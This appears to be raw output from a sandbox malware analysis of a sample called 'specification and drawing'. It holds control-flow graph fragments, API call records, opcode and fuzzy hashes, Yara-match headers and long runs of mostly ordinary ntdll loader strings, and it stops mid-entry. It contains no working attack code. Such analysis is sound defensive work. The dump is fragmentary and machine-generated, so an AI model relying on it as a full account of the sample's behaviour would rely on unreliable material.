                                                                                                          • Opcode ID: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                                                                          • Instruction ID: 380b514f1b228bc081d75c17ae9254c2119d2321acb5c64e8da0945d2a3bd4e4
                                                                                                          • Opcode Fuzzy Hash: 1eb63bc0a31705b8b50c71cf350c5bbdaf0718040e10bc9fba9c1a85ea39fc92
                                                                                                          • Instruction Fuzzy Hash: 9B90026224240003410971585514616900A97E1201B55C031E1015590DC72589916225
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                                                                          • Instruction ID: 39b11356add0c70f76e2829180d6813ab33b9a01751b46f48a692bb2d15c2d5c
                                                                                                          • Opcode Fuzzy Hash: 5d9a15aca7a36438eb376c6fb6c13252becdbb6ea120c165e6ce8087ae58d6c2
                                                                                                          • Instruction Fuzzy Hash: 1390023224140413D11571585604707500997D1241F95C422A0425558DD7568A52A221

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 372 1102c70-1102c7c LdrInitializeThunk
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                                                                          • Instruction ID: 909fc2b4ca3a4550b39ab19aeeb864a5ab6787f159b2023eaaf7fb7357fa332a
                                                                                                          • Opcode Fuzzy Hash: 19075f9873a5780692e6441f285d5579ced662d4f631586fe0f860834abf7306
                                                                                                          • Instruction Fuzzy Hash: B390023224148803D1147158950474A500597D1301F59C421A4425658DC79589917221
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                                                                          • Instruction ID: 55df88d00419f574049992b3107e915872bca788882001add47234a10ace856d
                                                                                                          • Opcode Fuzzy Hash: 243f437fd13e197d57897f8e78dc2229ca4981a93fad5f86683242223b1897a0
                                                                                                          • Instruction Fuzzy Hash: 5390023264550403D10471585614706600597D1201F65C421A0425568DC7958A5166A2

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 4143ac-4143ae 1 4143b0-4143bc 0->1 2 414429-41443d 0->2 3 414373-414390 1->3 4 4143be-4143ca 1->4 5 41445d-414463 2->5 6 41443f-41444e PostThreadMessageW 2->6 3->0 6->5 7 414450-41445a 6->7 7->5
                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: 2361o4QI$2361o4QI
                                                                                                          • API String ID: 1836367815-3806180685
                                                                                                          • Opcode ID: e2d99c1290c8e791b22f7134dbcd5559d0a492aa6781d34470d3428f2b1c55b5
                                                                                                          • Instruction ID: 5114dfc27e37c2844b5d0d952bbf8d8a230acc9a7d7e3ddd19e2c65ec9fb8e41
                                                                                                          • Opcode Fuzzy Hash: e2d99c1290c8e791b22f7134dbcd5559d0a492aa6781d34470d3428f2b1c55b5
                                                                                                          • Instruction Fuzzy Hash: D30170337442697ADB1655E82C928FAF7DDDFC3365704816EEA95C7252C3154C038395

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: 2361o4QI$2361o4QI
                                                                                                          • API String ID: 1836367815-3806180685
                                                                                                          • Opcode ID: bdaeac2891d156e517c70cce5b2a1b228c92b2475f2606c63c77cf88c13d6fd5
                                                                                                          • Instruction ID: f6bc12b4a7e54384fc08b28754581a0646dab71cd1bb19be4be7fabdc026553b
                                                                                                          • Opcode Fuzzy Hash: bdaeac2891d156e517c70cce5b2a1b228c92b2475f2606c63c77cf88c13d6fd5
                                                                                                          • Instruction Fuzzy Hash: 9F1129B1D0025C7AEB11AAE19C81DEFBB7C9F41358F448069FA44B7101D5785E068BA5

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041444A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostThread
                                                                                                          • String ID: 2361o4QI$2361o4QI
                                                                                                          • API String ID: 1836367815-3806180685
                                                                                                          • Opcode ID: 05357d2f48808b187999a6c1e57de2fcecde43931fb71b34567b6fbaf915147e
                                                                                                          • Instruction ID: 530b1707573153fa9b7f38926838a4d04c1a85311558d4362bc03077739b09d9
                                                                                                          • Opcode Fuzzy Hash: 05357d2f48808b187999a6c1e57de2fcecde43931fb71b34567b6fbaf915147e
                                                                                                          • Instruction Fuzzy Hash: 8701DBB1D0011C7AEB10AAE19C81DEF7B7CDF41798F448069FA14B7241D5785E068BB5

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 202 42ceb3-42cef4 call 404923 call 42ddf3 RtlAllocateHeap
                                                                                                          APIs
                                                                                                          • RtlAllocateHeap.NTDLL(?,0041E99E,?,?,00000000,?,0041E99E,?,?,?), ref: 0042CEEF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                          • Instruction ID: 30e79609f481ea63e4db638f7a1dac92b35ebc6749900525827dc58393b69420
                                                                                                          • Opcode Fuzzy Hash: 311047913c47a87db36be3ff7f68d10f10ca09af2a13ea7d97f05a6941379270
                                                                                                          • Instruction Fuzzy Hash: 83E092B6204214BFD614EE69EC41FEF37ADEFC9710F404029F909A7241CA74B9108BB8

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 207 42cf03-42cf44 call 404923 call 42ddf3 RtlFreeHeap
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4D8B4674,00000007,00000000,00000004,00000000,0041742C,000000F4), ref: 0042CF3F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 3298025750-0
                                                                                                          • Opcode ID: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                          • Instruction ID: 93d52155cd82351b0253c774491d9607e7b819bc1e9d4196672af213d8618792
                                                                                                          • Opcode Fuzzy Hash: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                          • Instruction Fuzzy Hash: C2E06DB6204204BBC614EE59DC45EDB73ACEFC9714F004019FA08A7242DA74B91087B4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 217 42cf53-42cf8f call 404923 call 42ddf3 ExitProcess
                                                                                                          APIs
                                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,40B9B70A,?,?,40B9B70A), ref: 0042CF8A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2400421345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_400000_specification and drawing.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: ExitProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 621844428-0
                                                                                                          • Opcode ID: 93c9f9102f68108a7200f743b159bea482fc89f88471024d8a2ed1e98eb2cdd2
                                                                                                          • Instruction ID: 5a3f9d1a4c76ec654bf4906ff3ec58e68c58e48e86c582a1c5830d33f06476cf
                                                                                                          • Opcode Fuzzy Hash: 93c9f9102f68108a7200f743b159bea482fc89f88471024d8a2ed1e98eb2cdd2
                                                                                                          • Instruction Fuzzy Hash: 81E04676240614BBD620AB6AEC41FEB776DEBC5710F00412AFA08A7241CAB9B91086E4

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 367 1102c0a-1102c0f 368 1102c11-1102c18 367->368 369 1102c1f-1102c26 LdrInitializeThunk 367->369
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                                                                          • Instruction ID: 667783eb17faf009446a6db66f3c8b2c6db4a6e8c89cde7a9fb29c8e752d30ae
                                                                                                          • Opcode Fuzzy Hash: 34271d13c2c1128d0679c8ec2b9e1848096a999c70827aa7eba769305cb73600
                                                                                                          • Instruction Fuzzy Hash: 7BB09B72D415C5C6DA16E764570C717790077D1701F25C075D2030685F8778C1D1E275
                                                                                                          Strings
                                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01178F26
                                                                                                          • The resource is owned exclusively by thread %p, xrefs: 01178E24
                                                                                                          • The resource is owned shared by %d threads, xrefs: 01178E2E
                                                                                                          • an invalid address, %p, xrefs: 01178F7F
                                                                                                          • *** then kb to get the faulting stack, xrefs: 01178FCC
                                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E86
                                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01178F3F
                                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01178DD3
                                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01178E3F
                                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01178F34
                                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01178FEF
                                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01178E02
                                                                                                          • *** Inpage error in %ws:%s, xrefs: 01178EC8
                                                                                                          • <unknown>, xrefs: 01178D2E, 01178D81, 01178E00, 01178E49, 01178EC7, 01178F3E
                                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01178E4B
                                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01178D8C
                                                                                                          • *** enter .cxr %p for the context, xrefs: 01178FBD
                                                                                                          • read from, xrefs: 01178F5D, 01178F62
                                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01178F2D
                                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01178DB5
                                                                                                          • The instruction at %p referenced memory at %p., xrefs: 01178EE2
                                                                                                          • Go determine why that thread has not released the critical section., xrefs: 01178E75
                                                                                                          • The instruction at %p tried to %s , xrefs: 01178F66
                                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01178DC4
                                                                                                          • This failed because of error %Ix., xrefs: 01178EF6
                                                                                                          • *** enter .exr %p for the exception record, xrefs: 01178FA1
                                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01178DA3
                                                                                                          • a NULL pointer, xrefs: 01178F90
                                                                                                          • write to, xrefs: 01178F56
                                                                                                          • The critical section is owned by thread %p., xrefs: 01178E69
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                          • API String ID: 0-108210295
                                                                                                          • Opcode ID: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                                                                                          • Instruction ID: e73718836fe4afcd2c349f782018b60d690a9e2c6e36126d81b7a5bb78b1292e
                                                                                                          • Opcode Fuzzy Hash: 7e714f7635efd3b1325f3b78597071bcfb961652dd14c2e8f19f89afdf17b6bb
                                                                                                          • Instruction Fuzzy Hash: 9B81E479B40215BFDB2EAA19DC89DAB3F35EF56B54F010048F248AF352E7718912C762
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                          • API String ID: 0-2160512332
                                                                                                          • Opcode ID: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                                                                          • Instruction ID: 72d9557832db58db8c063178876e12c19de97fd84b5f83d3155cb4c81a1a36cd
                                                                                                          • Opcode Fuzzy Hash: f46e99cf4fdf0eb45a3bb949723dfab489fe2a0faeedccf5df6fc5c066d87870
                                                                                                          • Instruction Fuzzy Hash: 17928E71604742AFE729DF19D880FABB7E8BB84B54F04492DFA94D7250D770E884CB92
                                                                                                          Strings
                                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0113540A, 01135496, 01135519
                                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354E2
                                                                                                          • Thread identifier, xrefs: 0113553A
                                                                                                          • Critical section address., xrefs: 01135502
                                                                                                          • Address of the debug info found in the active list., xrefs: 011354AE, 011354FA
                                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011354CE
                                                                                                          • Critical section address, xrefs: 01135425, 011354BC, 01135534
                                                                                                          • double initialized or corrupted critical section, xrefs: 01135508
                                                                                                          • Critical section debug info address, xrefs: 0113541F, 0113552E
                                                                                                          • 8, xrefs: 011352E3
                                                                                                          • undeleted critical section in freed memory, xrefs: 0113542B
                                                                                                          • Invalid debug info address of this critical section, xrefs: 011354B6
                                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 01135543
                                                                                                          • corrupted critical section, xrefs: 011354C2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                          • API String ID: 0-2368682639
                                                                                                          • Opcode ID: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                                                                          • Instruction ID: 62c780c157bc2cef7bcd422742a23cd9fac389810e31fe87a28dc7282ad97876
                                                                                                          • Opcode Fuzzy Hash: 3704cc0e0f053906e1c6310aacda72b423739f73d2cc0a74b32c0a8a098664da
                                                                                                          • Instruction Fuzzy Hash: 58819EB1A40349EFDB68CF99C845BEEBBB6BB48B14F50811AF544BB680D375A940CB50
                                                                                                          Strings
                                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01132602
                                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011325EB
                                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01132498
                                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01132506
                                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01132409
                                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011322E4
                                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011324C0
                                                                                                          • @, xrefs: 0113259B
                                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01132412
                                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 0113261F
                                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01132624
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                          • API String ID: 0-4009184096
                                                                                                          • Opcode ID: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                                                                          • Instruction ID: 9e3c4d930c0cbc607cb50ece130f3309cebea4ca5aa2bf45f229dd87b93b8807
                                                                                                          • Opcode Fuzzy Hash: e47a2acc3578bd04b982fec5c10c3440b375a937bfd3acdd094cfb11aa024038
                                                                                                          • Instruction Fuzzy Hash: 85027EF1D002299BDB25DB54CC81BDEB7B8AF44704F4041EAE749A7241EB70AE84CF99
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                          • API String ID: 0-2515994595
                                                                                                          • Opcode ID: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                                                                          • Instruction ID: 85e1424fc571a3fbf4b00e5df0cd0a9d7d61af5d3f339bdd0a73e5aa3d1d5929
                                                                                                          • Opcode Fuzzy Hash: a4687c0f75ef6c8f467e1b9b4600ea16e736d6cce6b8afbeadf196d828a24795
                                                                                                          • Instruction Fuzzy Hash: EC51EF715143019BC72DDF18C844BABBBECFFA8244F14491DEA98C7284E7B1D618CBA2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                          • API String ID: 0-3197712848
                                                                                                          • Opcode ID: efca52fdd6f50eca17dbcc746d5d69036b10cfbce1225ab01c55cab5ad545480
                                                                                                          • Instruction ID: a7326e8ed4bc7e8ce260e056f6f8fca30573d9742027c93f072da23606741bf5
                                                                                                          • Opcode Fuzzy Hash: efca52fdd6f50eca17dbcc746d5d69036b10cfbce1225ab01c55cab5ad545480
                                                                                                          • Instruction Fuzzy Hash: D112F371A08352CFD729DF28C480BAABBE4BF95704F0549ADF9C58B291E734D944CB92
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                          • API String ID: 0-1700792311
                                                                                                          • Opcode ID: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                                                                          • Instruction ID: ffc2855d4cdd807b773d4aaf49c85acf61b3be01ff40185fd86a117b11f2db48
                                                                                                          • Opcode Fuzzy Hash: 913e91e08bd327354fb8c64b9d080e45a18862b6335b94b7e6402fffdc64b029
                                                                                                          • Instruction Fuzzy Hash: C6D1EC31600786EFDB2ADF69C490AA9BBF1FF4A704F188059F4869B752C734E980CB14
                                                                                                          Strings
                                                                                                          • VerifierDebug, xrefs: 01148CA5
                                                                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01148A3D
                                                                                                          • VerifierFlags, xrefs: 01148C50
                                                                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01148A67
                                                                                                          • AVRF: -*- final list of providers -*- , xrefs: 01148B8F
                                                                                                          • VerifierDlls, xrefs: 01148CBD
                                                                                                          • HandleTraces, xrefs: 01148C8F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                          • API String ID: 0-3223716464
                                                                                                          • Opcode ID: f9d647630bda8483c0bf9e9f4d0f7d9d053106e4c86c9b0fdf3345ad48e3fa50
                                                                                                          • Instruction ID: 0a62a1d83cb1d3aa0c5288f87f17379eec03100a8d5c4ecb9a8bd747b1618da1
                                                                                                          • Opcode Fuzzy Hash: f9d647630bda8483c0bf9e9f4d0f7d9d053106e4c86c9b0fdf3345ad48e3fa50
                                                                                                          • Instruction Fuzzy Hash: 5C9147B1A06306EFD72EEFA8C8C0B9B7BE5AB55F18F050468FA816B241C7709C41C795
                                                                                                          Strings
                                                                                                          • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 01144E38
                                                                                                          • Execute '.cxr %p' to dump context, xrefs: 01144EB1
                                                                                                          • LdrpProtectedCopyMemory, xrefs: 01144DF4
                                                                                                          • ***Exception thrown within loader***, xrefs: 01144E27
                                                                                                          • minkernel\ntdll\ldrutil.c, xrefs: 01144E06
                                                                                                          • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 01144DF5
                                                                                                          • LdrpGenericExceptionFilter, xrefs: 01144DFC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
